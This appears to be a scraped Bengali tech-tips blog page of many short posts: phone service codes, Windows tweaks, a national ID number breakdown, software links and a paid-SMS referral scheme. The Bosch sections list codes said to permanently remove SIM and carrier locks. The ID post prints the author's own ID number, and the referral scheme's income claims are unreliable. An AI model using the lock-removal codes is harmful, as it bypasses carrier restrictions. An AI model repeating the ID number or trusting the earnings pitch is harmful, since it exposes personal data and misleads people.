প্রতিষ্ঠানটি এপস্ক নামের একটি বিদেশী প্রতিষ্ঠানের সাথে একযোগে এই কার্যক্রম তদারকি করবে। এই স্যাটেলাইট এর মাধ্যমে বাংলাদেশের তথ্য প্রযুক্তি খাত আরো শক্তিশালী হবে। জলবায়ু, বিভিন্ন প্রাকৃতিক দুর্যোগ ইত্যাদি সম্পর্কিত পূর্বাভাষ দেওয়া সহজ হবে। এছাড়াও এই স্যাটেলাইট এর মাধ্যমে আমরা কেবল টিভি নেটওয়ার্ক ছাড়াই প্রায় সকল টিভি চ্যানেল উপভোগ করতে পারব। এই কার্যক্রমে ব্যয় হবে প্রায় ১৫০ থেকে ২০০ মিলিয়ন মার্কিন ডলার।

Mobile/Cell ফোনের জন্য কায়দা বিশেষ এবং গোপন Codes


নোকিয়া গোপন Codes (সমস্ত মডেলে কাজ করতে পারে)
পরীক্ষা করুন IMEI*#06#
সফটওয়্যার সংস্করণ পরীক্ষা করুন *#8110#
Sim ঘড়ি থামে *#746025625#
Warranty মেনু *#92702689#
Press the following warranty code
6232 (OK) উৎ‍পাদনের প্রদর্শন করে মাস এবং বছর
7332 (OK) শেষ repairmentএর প্রদর্শন করে তারিখ
7832 (OK) প্রদর্শন করে তারিখ যেখানে ফোন ক্রয় করা হয়েছিল
9268 (OK) প্রদর্শন করে সিরিয়াল সংখ্যা
37832 (OK) Purchasing তারিখ MMYY নিযুক্ত করুন
87267 (OK) স্থানান্তর করে সব phone numbers, ছবি, অন্য একটি Hands Free
তে
Nokia 6150 গোপন Codes (অন্য মডেলে কাজ করতে পারে)
পরীক্ষা করুন IMEI *#06# Service menu *#92702689# সফটওয়্যার সংস্করণ পরীক্ষা করুন *#0000# or *#6110# Sim ঘড়ি থামে *#746025625#
Warranty মেনু *#92702689# Press the following warranty code 6232 (OK) উৎ‍পাদনের প্রদর্শন করে মাস এবং বছর 7332 (OK) শেষ repairmentএর প্রদর্শন করে তারিখ 7832 (OK) প্রদর্শন করে তারিখ যেখানে ফোন ক্রয় করা হয়েছিল 9268 (OK) প্রদর্শন করে সিরিয়াল সংখ্যা 37832 (OK) Set the Purchasing Date MMYY
87267 (OK) স্থানান্তর করে সব phone numbers, ছবি, অন্য একটি Hands Free
তে
The Reboot Trick
1. Go to calendar ( menu - 8 )
2. Make note / reminder
3. Enter some text into the edit box
4. Hold clear until whole text is cleared, then press back
5. Press 0. Main screen is shown but a space appears on the screen. You can't see it of course.
6. Enter 4 digits ( 1234 for example )
7. Use the down arrow to move the cursor to the left side of the numbers and the space (2 times down arrow)
8. Now enter 6 digits and press the green "Call button".
9. Wait some seconds..the phone will now flash the background light and finally reboot.Philips Genie Secrets (also work on other models)
View the IMEI *#06# Status register *#2254*# Activate and deactivate the "DEBUG CALL"-Mode *#2255*# Time you are connected to the network
*#2558*#
Phone reconnects to the network *#2562*# Warm start *#2565*# (NO) BLOCKING - list (15 items) *#3333*#Init, Flags, SIM LOCK *#3377*# Reset the (NO) BLOCKING – list *#3353*# Name, Length, SIM phase *#7378*#
SECURITY CODE
*#7489*# Activate and deactivate the SLEEP MODE *#7693*# SPURIOUS INTERRUPT
*#7787*# Activate the beep signal when the phone is reconnected to the network
*#2337*#Samsung SGH-600 Secrets (অন্য মডেলে কাজ করতে পারে) Show IMEI *#06# Show Software Version *#9999# Show Software Version (instructions) *#0837# Show Serial Parameters *#0001# Activates the smiley when charging *#9125#
Battery status (capacity, voltage, temperature) *#9998*228#
Program status
*#9998*246# Change Alarm Buzzer Frequency *#9998*289#
Debug screens
*#9998*324# Watchdog *#9998*364#
EEPROM Error Stack - Use side keys to select values. Cancel and ok.
*#9998*377# Trace Watchdog *#9998*427# Change LCD contrast *#9998*523# Jig detect *#9998*544# Memory status *#9998*636# SIM File Size *#9998*746# SIM Service Table *#9998*778# RTK (Run Time Kernel) errors *#9998*785#
Run, Last UP, Last DOWN *#9998*786#
Software Version *#9998*837#
Test Vibrator - Flash the screenligth during 10 seconds and vibration activated
*#9998*842# Vocoder Reg - Normal, Earphone or car kit can be selected *#9998*862#
Diag *#9998*872# Reset On Fatal Error *#9998*947# Last/Chk *#9998*999#
Yann debug screen *#9998*9266#
Software version *#9998*9999#
Changes serial parameters (s=?, f=0,1, t=0,1)
*0001*s*f*t#Sony CMDZ1 Secrets (also work on other models)
View IMEI
*#06# Show Software version and manufacture date # 8377466 #
Alcatel One Touch Secrets
View IMEI Number *#06#
Enter Service Menu *#000000#
View Secret Menu 000000 then press *
Sagem RC712 Secrets (অন্য মডেলে কাজ করতে পারে)
Enter Engineering menu
MENU - 5 - 1 - 1 - #
1) IMEI 2) Flash Eprom etc. 3) ? 4) SP unblock 5) ? 6) Contrast Settings.
When in menu type * and a new menu with new options will appear.Siemens S1 Secrets (also work on other models)
Show IMEI *#06# Tetris
Power on phone and enter PIN. before phone has locked onto network, F9, send own number, hit right button, hit 9. left is 2, right is 8, rotate is 5,
and drop is 4.
Monitor Mode
Menu, 9 (Phone Options), 7 (Phone Status), Left Display Button (left MENU key), 5553756, HangUp Button (Red HandSet key)
Now "Monitor" should appear at the bottom of the Network Options menu.
Pressing the right Display Button when in monitor mode will show a list of the
six cells with the strongest signals.Trium MTD30 Secrets (also work on other models)
Monitor mode
Hold C and press 379
Secret menu
Hold C and press 987
Version number
Hold C and press 597
Phase1 and 2
Hold C and press 499
Warm start
Hold C and press 179
Instant turn off
Hold C and press 999
Unlock menu
Hold C and press 787090Bosch 718 (also work on other models)
Secret Engineering menu (menu 10) appear
*#3262255*8378#
Display the IMEI
*#06#
To set the language automatically (Reset to English)
*#0000#
Set the Enhaced Full Rate
*#3370#
Reset the phone
#3370#
Enter sim lock code
*#9000#
Enter the network code
*#9003#
Enter the subset code
*#9004#
Remove the sim lock permanently
*#9100#
Remove the corporate lock permanently
*#9101#
Remove the provider lock permanently
*#9102#
Remove the network lock permanently
*#9103#
Remove the subset lock permanently
*#9104#
Bosch 738 (also work on other models)
Secret Engineering menu (menu 10) appear
*#3262255*8378#
Display the IMEI *#06#
To set the language automatically (Reset to English) *#0000#
Set the Enhaced Full Rate *#3370#
Reset the phone #3370#
Enter sim lock code *#9000#
Enter the network code *#9003#
Enter the subset code *#9004#
Remove the sim lock permanently *#9100#
Remove the corporate lock permanently *#9101#
Remove the provider lock permanently *#9102#
Remove the network lock permanently *#9103#
Remove the subset lock permanently *#9104#
Bosch COM607 (also work on other models)
Secret Engineering menu (menu 10) appear
*#3262255*8378#
Display the IMEI *#06#
To set the language automatically (Reset to English) *#0000#
Set the Enhaced Full Rate *#3370#
Reset the phone #3370#
Enter sim lock code *#9000#
Enter the network code *#9003#
Enter the subset code *#9004#
Remove the sim lock permanently *#9100#
Remove the corporate lock permanently *#9101#
Remove the provider lock permanently *#9102#
Remove the network lock permanently *#9103#
Remove the subset lock permanently *#9104#
Bosch 908 (also work on other models)
Secret Engineering menu (menu 10) appear *#3262255*8378#
Display the IMEI *#06#
To set the language automatically (Reset to English) *#0000#
Set the Enhaced Full Rate *#3370#
Reset the phone #3370#
Enter sim lock code *#9000#
Enter the network code *#9003#
Enter the subset code *#9004#
Remove the sim lock permanently *#9100#
Remove the corporate lock permanently *#9101#
Remove the provider lock permanently *#9102#
Remove the network lock permanently *#9103#
Remove the subset lock permanently *#9104#
Bosch 909/909s (অন্য মডেলে কাজ করতে পারে)
Display the IMEI *#06#
Set the language automatically *#0000#
Set the Enhanced Full Rate *#3370#
Reset the phone #3370#
Enter sim lock code *#9000#
Enter the network code *#9003#
Enter the subset code *#9004#
Remove the sim lock permanently *#9100#
Remove the corporate lock permanently *#9101#
Remove the provider lock permanently *#9102#
Remove the network lock permanently *#9103#
Remove the subset lock permanently
*#9104#Ericsson 688 Secrets (অন্য মডেলে কাজ করতে পারে)
Check the IMEI (International Mobile Equipment Identity)
*#06#
Reset the phones menu-language to English.
*#0000#

জেনে নিন বাংলাদেশের ন্যাশনাল আইডি কার্ডের নাম্বার বিশ্লেষণ


বিভিন্ন দেশ তার নাগরিকদের জন্য ন্যাশনাল আইডি কার্ডের ব্যবস্থা করে থাকে। বাংলাদেশ সরকারও তার নাগরিকদের জন্য সম্প্রতি ন্যাশনাল আইডি কার্ডের ব্যবস্থা করেছে। অনেক দেরীতে হলেও এটি বাংলাদেশ সরকারের একটি ভাল উদ্যোগ।
আমাদের আইডি কার্ডে কার্ডের পরিচয় সূচক ১৩টি নম্বর রয়েছে। এই ১৩টি নম্বরের রয়েছে আলাদা বৈশিষ্ট্য। আসুন জেনে নিই এই ১৩ টি নম্বর কি কি অর্থ বহন করে।
যেমন উদাহরণস্বরূপ একটি আইডি কার্ড নম্বর নেয়া যাক-
৮৪২৮৭০৮১৪৮৩৩৭ (আমার আইডি কার্ড)
*** এখানে প্রথম ২টি ডিজিট হচ্ছে জেলা কোড। যেমন এখানে ৮৪ হচ্ছে রাংগামাটি জেলার কোড।
*** এর পরবর্তী ডিজিট হচ্ছে ২। ২ কোডটি ব্যবহৃত হয় পৌর এলাকা বোঝানোর জন্য। এখানে ১ থাকার অর্থ পল্লী এলাকা, ৩ থাকার অর্থ শহর এলাকা, ৫ থাকার অর্থ ক্যান্টঃ বোর্ড, ৯ থাকার অর্থ সিটি কর্পোরেশন।
*** পরবর্তী ২টি ডিজিট হচ্ছে উপজেলা কোড। এক্ষেত্রে ৮৭ হচ্ছে রাংগামাটি সদর উপজেলা কোড।
*** পরবর্তী ২টি ডিজিট হচ্ছে পৌর ওয়ার্ড/ইউনিয়ন কোড। এখানে ০৮
*** পরবর্তী ৬টি ডিজিট হচ্ছে ব্যক্তিগত আইডেন্টিফিকেশন নম্বর।

জানতে চান আপনি পৃথিবীর কততম মানুষ?


কেমন হয় যদি আপনি জানতে পারেন যে আপনি পৃথিবীর কততম মানুষ। বিবিসি কর্তৃপক্ষ তাদের সফটওয়্যার মাধ্যমে এটা দাবী করেছে যে তারা যে কোন মানুষের পৃথিবীতে জন্মের সংখ্যাক্রম বলে দিতে পারবে। তাই আর অপেক্ষা কেন? জেনে নিন আপনি পৃথিবীর কততম মনুষ্য সদস্য।
তাই এক্ষুণি চলে যান নিচের ঠিকানায়। ওখানে আপনার জন্ম তারিখ দিয়ে দিন। তাহলেই আপনার উত্তর পেয়ে যাবেন।
এখানে ক্লিক করুন

ইমেইল করুন পাসওয়ার্ড প্রোটেক্ট করে


আমরা যারা ইন্টারনেট এ কমবেশি সময় দিয়ে থাকি তারা প্রায় ইমেইল আদান প্রদান করে থাকি। অনেক সময় গুরুত্বপূর্ণ তথ্যাদি ইমেইলের মাধ্যমে পাঠাতে হয়। কিন্তু এর গোপনীয়তা কতটুকু বজায় রাখা সম্ভব? এমন যদি হয় যে আপনি আপনার ই-মেইলটিকে পাসওয়ার্ড প্রোটেক্ট করে পাঠাতে পারেন, তাহলে কেমন হয়? গোপনীয়তা আরেকটু কড়া হয়। তাহলে আসুন জেনে নিই কিভাবে পাসওয়ার্ড প্রোটেক্ট করে ই-মেইল করতে হয়।
১। এজন্য আপনাকে যেতে হবে এই লিঙ্কে। সাইটটির নাম লকবিন।
২। এখানে একটি ফর্ম আসবে। ফরমটির নির্দিষ্ট স্থানে যথাযথ ডাটা দিয়ে পূরণ করুন।
৩। এবার মেসেজ বডির নিচের দিকে অবস্থিত ক্যাপচাটি পূরণ করুন।
৪। এবার I accept.... চেক বক্সটিতে টিক চিহ্ন দিন এবং Submit বাটনে ক্লিক করুন।
৫। ব্যাস তাহলে আপনার ই-মেইলটি পাসওয়ার্ড প্রোটেক্ট হয়ে চলে গেল আপনার নিদিষ্ট ঠিকানায়।
এখন পাসওয়ার্ডটি তাকে জানিয়ে দিন। রিসিভার মেইলটি পড়তে চাইলে একটি পপআপ আসবে এবং পাসওয়ার্ড চাইবে। এখানে সঠিক পাসওয়ার্ডটি দিলেই কেবল রিসিভার সেই ই-মেইলটি পড়তে পারবে।

চার্জ ছাড়াই ১৫ বছর চলবে মোবাইল!!


কী, টাইটেলটি পড়ে অবাক হয়েছেন? অবাক হওয়ারই কথা। যুক্তরাষ্ট্রের একটি প্রযুক্তিপ্রতিষ্ঠান এবারের সিইএস মেলায় ‘স্পেয়ারওয়ান’ নামে মোবাইল ফোন নিয়ে হাজির হয়েছে যার ব্যাটারি বিনাচার্জেই ১৫ বছর পর্যন্ত চলবে। এক্সপিএএল পাওয়ার নামেরপ্রতিষ্ঠানটি তাদের তৈরি মোবাইল ফোন বিষয়ে দাবি করেছে, যা কিছুই ঘটুক এ ফোনের ব্যাটারি লাইফ ১৫ বছর। নির্মাতা প্রতিষ্ঠানের ভাষ্য ‘স্পেয়ারওয়ান’ মোবাইল ফোন তৈরি করা হয়েছে জরুরী অবস্থার কথা মাথায় রেখে। এ মোবাইলে চার্জ দেয়া হলেবা চার্জবিহীন ফেলে রাখলেও ব্যাটারি ১৫ বছরের আগে নষ্ট হবার আশংকা কম।
এ মোবাইল ফোনে একটি এএ ব্যাটারি ব্যবহার করা হয়েছে। এ ছাড়াও এ ফোনটিতে স্মার্টফোনের মতো অনেক বেশি ফিচার নেই। কেবল মোবাইল ডায়াল করার জন্যগুরুত্বপূর্ণ নম্বরগুলো রাখা আছে। কেবল গুরুত্বপূর্ণ ফোন করা এবং ফোন রিসিভ করার কাজ করে স্পেয়ারওয়ান। এছাড়াও স্বয়ংক্রিয়ভাবে লোকেশন জানাতে পারে এ ফোনটি।ফিচার হিসেবে এ মোবাইলটিতে কেবল টর্চ সুবিধা রয়েছে। জরুরী অবস্থায় ব্যাক-আপ ফোন হিসেবে স্পেয়ারওয়ান ব্যবহার করা যাবে।

চার্জ ছাড়াই ১৫ বছর চলবে মোবাইVলল্তকক


কী, টাইটেলটি পড়ে অবাক হয়েছেন? অবাক হওয়ারই কথা। যুক্তরাষ্ট্রের একটি প্রযুক্তিপ্রতিষ্ঠান এবারের সিইএস মেলায় ‘স্পেয়ারওয়ান’ নামে মোবাইল ফোন নিয়ে হাজির হয়েছে যার ব্যাটারি বিনাচার্জেই ১৫ বছর পর্যন্ত চলবে। এক্সপিএএল পাওয়ার নামেরপ্রতিষ্ঠানটি তাদের তৈরি মোবাইল ফোন বিষয়ে দাবি করেছে, যা কিছুই ঘটুক এ ফোনের ব্যাটারি লাইফ ১৫ বছর। নির্মাতা প্রতিষ্ঠানের ভাষ্য ‘স্পেয়ারওয়ান’ মোবাইল ফোন তৈরি করা হয়েছে জরুরী অবস্থার কথা মাথায় রেখে। এ মোবাইলে চার্জ দেয়া হলেবা চার্জবিহীন ফেলে রাখলেও ব্যাটারি ১৫ বছরের আগে নষ্ট হবার আশংকা কম।
এ মোবাইল ফোনে একটি এএ ব্যাটারি ব্যবহার করা হয়েছে। এ ছাড়াও এ ফোনটিতে স্মার্টফোনের মতো অনেক বেশি ফিচার নেই। কেবল মোবাইল ডায়াল করার জন্যগুরুত্বপূর্ণ নম্বরগুলো রাখা আছে। কেবল গুরুত্বপূর্ণ ফোন করা এবং ফোন রিসিভ করার কাজ করে স্পেয়ারওয়ান। এছাড়াও স্বয়ংক্রিয়ভাবে লোকেশন জানাতে পারে এ ফোনটি।ফিচার হিসেবে এ মোবাইলটিতে কেবল টর্চ সুবিধা রয়েছে। জরুরী অবস্থায় ব্যাক-আপ ফোন হিসেবে স্পেয়ারওয়ান ব্যবহার করা যাবে।

দ্রুত কম্পিউটার চালু করুন

আমাদের অনেকের PC তে My Compute চালু হতে একটু সময় নেয়।
আমরা অনেকেই Computer এ Network Drive ব্যবহার করি না। আর ব্যবহার করলেও তা My computer এ Show করাই না।
আবার আমাদের অনেকের Remote Registry দরকার হয় না।
নিচের দুটি পদ্ধতি দুটো Apply করলে আশা করি আপনার My computer টি আরো দ্রুত চালু হবে।
১. My Computer –> Tools –> Folder Options –> View চালু করুন “Automatically search for network files and folders" এর সামনে একটি ক্লিক চেক করা থাকে, এটি তুলে দিন।

এবং

২. Run –> regedit রেজিস্ট্রি এড্টির চালু হবে।

HKEY_LOCAL_MACHINE –> Software –> Microsoft –> Windows –> Current Version –> Explorer –> RemoteComputer –> NameSpace এর {D6277990-4C6A-11CF-8D87-00AA0060F5BF} এর Keyটি মুছে দিন।

এবার computer Restart দিন।

(অদৃশ্য) নাম ও আইকন ছাড়া ফোল্ডার বানান


আজ আপনাদের শেখাবো কিভাবে খুব সহজে কোন আইকন ও নাম ছাড়া ফোল্ডার বানানো যাবে। এই ফোল্ডার অদৃশ্য থাকার কারণে কোন সিকিউরিটি রিজনে কাজে লাগাতে পারবেন। অনেকেই ফোল্ডার হাইড/আনহাইড করে ফোল্ডার লুকিয়ে থাকেন কিন্তু এভাবে ফোল্ডার লুকানো যেতে পারে সেটা অনেকেই জানেন না। এজন্য প্রথমে একটি ফোল্ডার তৈরি করুন। এবার তাতে মাউসের ডান বাটনে ক্লিক করে রিনেম সিলেক্ট করুন। এখন কীবোর্ড থেকে Alt চেপে ধরে 0160 চাপুন। এবার এন্টার দিয়ে দেখুন কোন নাম দেখা যাচ্ছে না। এখন ফোল্ডারটিকে গায়েব করার পালা। এজন্য ফোল্ডারটির উপর আবার মাউসের ডান বাটনে ক্লিক করে Properties>>Customize>>Change Icon এ যান। এবার নিচের চিত্রের মতো অদৃশ্য আইকনের একটি সিলেক্ট করুন। এবার OK করে বেরিয়ে আসুন।

কম্পিউটার বন্ধ করুন ২ সেকেন্ডে


এইবার কম্পিউটার বন্ধ হবে সুপার ফাস্ট! এর জন্য কোন জটিল রেজিস্ট্রি কিংবা কোন সফটওয়্যার ইন্সটল করবার প্রয়োজন নেই। শুধু নিচের ধাপগুলো অনুসরণ করুন আর দেখুন জাদু!

১. কীবোর্ড থেকে Ctrl+Alt+Delete চাপুন। টাস্ক ম্যানেজার খুলবে।
২. Shut Down এ ক্লিক করুন।
৩. Ctrl কী চেপে ধরে Turn Off এ ক্লিক করুন। খেল খতম!

টাকা + auto সাইট সাবমিট করুন


সবাই কেমন আছেন। আশা করি ভালই আছেন। আজকে আমি একটি গুরুত্বপূর্ন সাইটের লিংক দিব, যে সাইট দিয়ে আপনি এক ক্লিকেই AUTO আপনার সাইটের লিংক সাবমিট করতে পারবেন সাথে আপনি ইনকাম করতে পারেন। যারা ওডেস্ক বা ফ্রিল্যান্সারে কাজ করেন, তারা এই রকম অনেক কাজ পেয়ে থাকেন।
আবার অনেকে সফটওয়ার কিনেও ব্যাকলিংক বা সাইট সাবমিটের কাজ করে থাকেন। আর আমিও ব্যবহার করে দেখেছি যে আমার সাইট টি ১ দিনে সার্চ ইন্জনে এড হয়ে গেছে। তো চলুন দেখা যাক কিভাবে সাইটের এড্রেস সাবমিট করবেন। প্রথমে এই লিংকে যান তারপর আপনি ওখানে আপনার প্রয়োজনীয় যা যা তথ্য চাই দিন। ‍‍‍
সুমন‌‌‌‌

নিজস্ব RUN COMMAND তৈরি করুন


মাইক্রোসফট উইন্ডোজ অপারেটিং সিস্টেমে রান কমান্ডের মাধ্যমে আপনি সরাসরি একটি Run Command এর সাহায্যে কোন একটি Application অথবা Document খুলতে পারেন। তবে, এটা শুধু Inbuilt Windows Program যেমন কমান্ড প্রম্পট (cmd), ক্যালকুলেটর (clac) এর ক্ষেত্রে কাজ করে। যেখানে অন্য সকল File অথবা Application খুলতে বিভিন্ন পথ ঘুরে খুলতে হয়। আপনি কি কখনও বিস্ময়ের উদ্রেকে আপনার প্রিয় প্রোগ্রাম, ফাইল কিংবা ফোল্ডার আপনার নিজের কাস্টমাইজড কমান্ড দ্বারা এক ক্লিকে খুলতে চেয়েছেন? তাহলে আসুন দেখা যাক কিভাবে নিজের কাস্টমাইজড Run Command তৈরী করা যায় শিখে নিই।
এই পোষ্ট এ আমরা উদাহরন হিসেবে Firefox ওপেন করব। আপনি ইচ্ছে করলে যেকোন Program অথবা File সিলেক্ট করতে পারেন । কিভাবে আমরা কাজ গুলো করব তা নিছে ক্রমিক অনুসারে দেয়া হল।

1.আপনার Desktop এ Right ক্লিক করে New -> Shortcut সিলেক্ট করুন।
2. এখন আপনি “Creat shortcut ” window দেখতে পাবেন।
3.আপনি সেখানে দেখতে পাবেন Browse ওখানে ক্লিক করুর এবং My Computer এ যান এবং আপনার কাঙ্খিত Folder টি সিলেক্ট করে দিন এবং Ok ক্লিক করে আপনার পছন্দ মত একটি নাম লিখুন, যে নামটি পরবর্তিতে আপনার Run Command নাম হবে। আমি এখানে আমার shortcut এর নাম “sam” দিলাম । এবার Finish বাটন এ ক্লিক করুন।
4. এখানে আপনি আপনার ডেস্কটপে “sam” নামে নতুন একটা shortcut দেখতে পাবেন। এবার আপনার যা করা দরকার তা হল এই shortcut টি Copy করে আপনার Computer এর Windows Folder( সাধারনতঃ C:/windows ) এ pest করতে হবে।
5. এবার আপনি ইচ্ছে করলে আপনার ডেস্কটপ থেকে shortcut টি মুছে ফেলতে পারেন ।
6. আপনি তৈরী করে ফেলেছেন আপনার কাঙ্খিত Run Command। এখন চলে যান আপনার Run Box এ এবং sam লিখে Enter চাপুন ।
কি চালু হল ত আপনার program .
এভাবে আপনি ইচ্ছে করলে যেকোন File অথবা Application এর জন্য Command তৈরী করতে পারবেন।
আপনি যদি কোন File এর জন্যCommand তৈরী করতে চান তাহলে আপনাকে সেই File এর shortcut তৈরী করতে হবে।
সুতরাং এখন থেকেই তৈরী করুন আপনার নিজস্ব Run Command এবং চমকিয়ে দিন আপনার বন্ধুদের।
যদি আপনি এর থেকে কিছু শিখতে পারেন তাই আমার পুজি।

এখন টাকা আয় করুন শুধুমাত্র আপনার মুঠোফোন ব্যবহার করে !!

কোনদিন কি ভেবেছেন আপনার মুঠোফোন এ এসএমএস আসলে তার জন্য আপনি টাকা পাবেন অর্থাত ‍আপনাকে Pay করা হবে?? জি হা আপনারা্ ঠিকি শুনেছেন, Textcashnetwork নামের প্রতিস্ঠানটি এ কাজটি করবে।ভয় পাবেন না যেন।এ জন্য আপনাকে একটা পয়সাও খরচা করতে হবে না।একদম না।

কি মনে প্রশ্ন জাগল “কোন টাকা খরচ কোরব না তাও ‍আমাকেকেন তারা pay কোরবে?”

প্রশ্নটির উত্তর দেয়ার আগে জেনে নেব Textcashnetwork আসলে কি? এবং কিভাবে এটি কাজ করে।

Textcashnetwok কি: Textcashnetwork হচ্ছে একটি Advertising company.এরা বিভিন্ন প্রতিষ্ঠানের নিকট হতে টাকা নেয় বিনিময়ে ঐ প্রতিষঠানের হয়ে লাভজনক স্থানে Advertisement দিয়ে থাকে।সুধু পার্থক্য এতুটুক অন্য Advertising Company এর মত Textcashnetwork তাদের Ad সমূহ Paper, Television, Billboard এ না দিয়ে আমার আপনার মত সাধারন ভোক্তাদের মুঠোফোনে SMS আকারে দিবে।ভেবে বলুন তো Paper এ Ad দেয়ার জন্য কে টাকা টা পায়? অবশ্য্ঈ Paper প্রকাশক প্রতিষ্ঠন।ঠিক একি ভাবে আপনার মুঠোফোনে Ad দেয়ার বিনিময় Textcashnetwork আপনাকে Pay করবে।নিচের ছবিটা দেখলে বিষয়টা আরো পরিষ্কার হব-

উদাহরন হিসাবে ধরুন: Y Company Ltd তাদের কোম্পানীর Ad প্রকাশের জন্য Textcashnetwork কে 10000$ প্রদান করল।Textcashnetwork এ অর্থের ২০%(কাল্পনিক) অংশ তাদের সাথে নিবন্ধিত ব্যক্তিদের প্রদান করবে এবং বিনিময়ে তাদের মুঠোফোনে SMS এর মাধ্যমে Ad দিবে।

প্রতিদিন সর্বচ্চ ৫টি SMS গ্রহন করে মাস শেষে পাবেন ৭.৫০$ অর্থাত ৫৬০টাকা।আপনার যত গুলো সিম থাকবে আপনি তত গুলো এ্যকাউন্ট খুলতে পারবেন।আরো মাজার বিষয় ‍আপনি যদি কাওকে Textcashnetwork join করার জন্য Refer করেন তবে Textcashnetwork এর জন্য আপনকে Pay করা টাকার পরিমান বড়িয়ে দিবে।

উদাহরন:

10Refer = 7.50x10= 75$

100 Refer= 7.50x100= 750$

মুঠোফোন তো এখন সবার হাতে হাতে। এটিতে Ad দেয়ার চেয়ে আর লাভজনক কাজ আর কি হতে পারে? সরাসরি ভোক্তার হাতে Ad টি পৌছে যাবে।আর Textcashnetwork এ বুদ্ধিটি কাজে লাগিয়েছে।তবে আর দেরি কেন আজি আপনার একাউন্ট খুলে ফেলুন।আগামী ১৬.০১.২০১২ তারিখ পর্য্ন্ত ফ্রি একাউন্ট খোলা যাবে।টাকার অংকটা বেশী না হয়তো তবে ভাবুন তো দিনে মাত্র ৫টি SMS এর বিনিময়ে যদি মাস শেষে আপনাকে ৫৬০৳ দওয়া হয় তবে খারাপ কি বলুন?আপনার কলেজ/স্কুল যাওয়ার রিক্সা ভাড়াটা অথবা মুঠোফোনে Recharge টা বেচে গেল তাঈ না?

তবে Textcashnetwork এ আপনার একাউন্ট খোলার জন্য অবশ্ঈ একজনের Refer লাগবে।আপনারা যারা এখানে একাউন্ট খুলতে চান তাদের জন্য একটি Referral link আমি নিচে দিয়ে দিলাম।নিচের লিংক টি সুধু আপনার Registration এর জন্য দিলাম।আপনি Registration করার পর আপনি আপনার Refer দের আপনার Referral link টি দিবেন।

sumon1588.textcashnetwork.com

যারা আচ্কাউন্ট খুলেছেন অথবা খুলতে চান তাদের বলছি অবশ্শই আপনার ইমেল এবং ফোন নাম্বার টি Validate করা লাগবে.ফোন নাম্বার টি Validate এর জন্য আপনার প্রফাইল পেজ এ (Account information) ঢুকুন পেজ এর একদম নিচে যান দেখবেন ফোন নাম্বার এর একটি অপশন আছে (Current Phone Number) ক্লিক করুন নতুন পেজ আসবে এইখানে add new তে ক্লিক করুন নতুন পেজ আসলে Phone Type: option এ mobile select করুন এখন সব পূরণ করে save চাপুন.আপনার mobile এ একটি SMS আসবে Yes লিখে sms টি reply করুন.
আসসালামু আলাইকুম, আবারও আপনাদের শুভেচ্ছা জানিয়ে আজকের টিউন শুরু করছি। কেমন আছেন আপনারা? আশা করি অনেক ভাল আছেন সৃষ্টিকর্তার রহমতে। আজ আপনাদের জন্য নিয়ে আসলাম ১টি সফটওয়্যার এই সফটয়ারটি মূলত আপনার উন্ডোজের সকল এপলিকেশন গুলোকে ব্যাকআপ রাখে এবং কোন কারনে উইন্ডোজ নস্ট/করাপ্ট হয়ে গেলে ব্যাকআপ ফাইল থেকে রিস্টোর করে। এই সফটয়ারটির মাধ্যমে আপনি ৫ মিনিটের মধ্যে উইন্ডোজ সহ সকল সফটওয়ার ও ড্রাইভার সেটআপ দিতে পারবেন।আমরা ৫ মিনিটে XP SETUP দেওয়ার জন্য যে সব সফটওয়্যার ব্যবহার করি সে গুলো সাইজ অনেক বড় প্রায় ৩০০-৫০০ এমবি কিন্তু আজ আপনাদের যে সফটওয়্যার দিব তার সাইজ মাএ ৫ এমবি

ডাউনলোড করুন

সাধারণ কীবোর্ডকে বানিয়ে ফেলুন মাল্টিমিডিয়া কীবোর্ড


আমরা সবাই মাল্টিমিডিয়া কীবোর্ডের সুবিধাগুলো সম্পর্কে অবগত আছি। অনেকেই ইচ্ছা থাকা স্বত্ত্বেও মাল্টিমিডিয়া কীবোর্ড কিনে ব্যবহার করতে পারে না। অর্থাৎ সাধ ও সাধ্যের মধ্যে সামঞ্জস্য হয় না। আজ আপনাদের জন্য নিয়ে এসেছি এমনই একটি সফটওয়্যার যেটি ব্যবহার করলে আপনাকে এই আফসোসটুকু করতে হবেনা বলে আশা করছি। সফটওয়্যারটির নাম Active Keys।
সফটওয়্যারটির মাধ্যমে আপনি আপনার কীবোর্ডকে ইচ্ছামত কাস্টমাইজ করে নিতে পারবেন। তাই এক্ষুনি ডাউনলোড করে ফেলুন নিচের লিঙ্ক হতে। (সফটওয়্যারটি ট্রায়াল ভারশন দেওয়া আছে। কারণ এটির ফুল বা ক্র্যাকড ভারশন অনেক খুজেঁও পাওয়া যায়নি।)
ডাউনলোড করুন

জানতে চান আপনার ওয়েবসাইটের/ব্লগ মূল্য কত?


একটি ভাল ব্লগ বা ওয়েব সাইট নিজের অজান্তেই অনেক সময় নিজের সবচেয়ে বড় সম্পদ হয়ে উঠে। একটি গাছকে যত্ন নিলে যেমন সেটি বড় হয়ে ভাল ফল দেয় তেমনি একটি ব্লগ বা ওয়েব সাইট এর ভাল প্রমোশন করা হলে সেই সাইটটি ভবিষ্যতের অবলম্বন হয়ে গড়ে উঠে। অনেকেরই এমন ওয়েব সাইট আছে যেখানে প্রায় প্রতিদিনই হাজার হাজার ভিজিটর ভিজিট করে থাকে। অনেকেই জানেনই না যে তার ব্লগ বা ওয়েব সাইটটির মূল্য কত। এজন্য আজ আপনাদের জন্য নিয়ে এসেছি এমনই একটি সাইট যার মাধ্যমে আপনি আপনার ওয়েব সাইটটির প্রকৃত মূল্য জানতে পারবেন।
সাইটটিতে যাওয়ার জন্য এই লিঙ্কে www.yourwebsitevalue.com ক্লিক করুন। সাইটটিতে যাওয়ার পর How much is your website worth লেখা অংশের নিচের বক্সটিতে আপনার ওয়েব সাইটটির লিঙ্ক দিয়ে Estimate Website Worth বাটনে ক্লিক করুন। এরপর ১০টি টেস্ট এর মাধ্যমে আপনাকে জানিয়ে দেওয়া হবে আপনার ওয়েব সাইটটির মূল্য কত।

বাংলা কোরান শরীফ সকল বাংলাদেশী ভাইদের জন্য


যারা আরবীতে কোরআন পাঠ শিখেননি তাদের জন্য সম্পূর্ন বাংলা ভাষায় প্রকাশিত কোরআন শরীফ ইন্টারনেট থেকে ডাউনলোড করে পড়তে পারেন। এখানে ক্লিক করুন

বিনামূল্যে ডাউনলোড করুন প্রিমিয়াম একাউন্ট এর মত

